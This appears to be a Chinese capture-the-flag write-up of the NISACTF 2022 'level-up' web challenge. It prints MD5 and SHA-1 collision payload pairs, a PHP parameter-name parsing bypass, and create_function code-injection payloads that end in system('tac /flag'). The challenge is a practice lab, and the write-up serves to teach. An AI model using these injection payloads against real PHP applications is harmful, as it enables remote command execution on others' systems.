NSS [NISACTF 2022]level-up

简介: NSS [NISACTF 2022]level-up

NSS [NISACTF 2022]level-up

开题没东西,注释有提示。

看到disallow就想到robots.txt。

第二关,md5强碰撞。

array1=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%24%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%82%7D%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%84%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEcC%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%BC%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%99%B59%F9%FF%C2&array2=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%A4%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%02%7E%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%04%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEc%C3%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%3C%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%9959%F9%FF%C2                //burp发包

第三关,sha1强碰撞。

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

第四关,php的变量解析绕过。

?NI+SA[=txw4ever   //是php的变量解析绕过        ?NI+SA+可以,?NI[SA[不行,不知道为什么

第五关,

正则表达式 让第一个字符不能为字母数字下划线

最后的/i是不区分大小写,/s匹配任何不可见字符 /D如果以$限制结尾字符,则不允许结尾有换行


php create_function 适用范围:php4>=4.0.1,php5,php7


[(3条消息) php代码审计]之create_function()函数_o3Ev的博客-CSDN博客

creat_function(string $agrs,string $code)
//string $agrs  声明的函数变量部分
//string $code  执行的方法代码部分

create_frunction()函数会创建一个匿名函数(为lambda样式),并会在内部执行eval()函数,在这里也就是执行后面的return语句,而这个位置正好是属于(string$code)的

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?> 

举个例子

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>


传入url?sort_by='"]);}phpinfo();/*
$sort_function =' return 1 * ' . $sorter . '($a["'  '"]);}phpinfo();
/* . '"], $b["' . $sort_by . '"]);';

有点点SQL注入的感觉了

payload:

a=\create_function&b=return 'mmkjhhsd';}var_dump(scandir('/'));/*
发现根目录下有一个flag文件
然后
?a=\create_function&b=}system('tac /flag');//

//  \create,第一个\绕过正则,}闭合create_function,从而可以自己写代码命令执行如system(什么什么)


目录
相关文章
Unknown encoder ‘libx264‘的解决方法
Unknown encoder ‘libx264‘的解决方法
1152 0
|
2月前
fix libpng warning: iCCP: Not recognizing known sRGB profile ......
本文介绍了如何解决在使用ImageMagick 7.1.0-13 q16 x64时出现的libpng警告:iCCP: 不识别已知的sRGB配置文件的问题。提供了一个批处理脚本,该脚本可以搜索子目录中的PNG文件并处理它们,以消除警告。文章还提供了脚本的位置和运行结果的截图。
|
3月前
NSS [NISACTF 2022]popchains
NSS [NISACTF 2022]popchains
33 0
NSS [NISACTF 2022]popchains
|
3月前
NSS [NISACTF 2022]babyupload
NSS [NISACTF 2022]babyupload
38 0
|
6月前
|
Python
libpng warning: iCCP: cHRM chunk does not match sRGB
libpng warning: iCCP: cHRM chunk does not match sRGB
182 0
|
开发工具
WARNING: library configuration mismatch
WARNING: library configuration mismatch
304 0
解决办法:syslinux:Accessing physical drive
解决办法:syslinux:Accessing physical drive
54 0
解决办法:syslinux:Accessing physical drive
libtool: Version mismatch error. This is libtool 2.4.6, but the definition of this LT_INIT
libtool: Version mismatch error. This is libtool 2.4.6, but the definition of this LT_INIT
127 0
fatal error: gnu/stubs-n64_hard_2008.h: No such file or directory
fatal error: gnu/stubs-n64_hard_2008.h: No such file or directory
129 0
ERROR: libx264 not found
ERROR: libx264 not found
167 0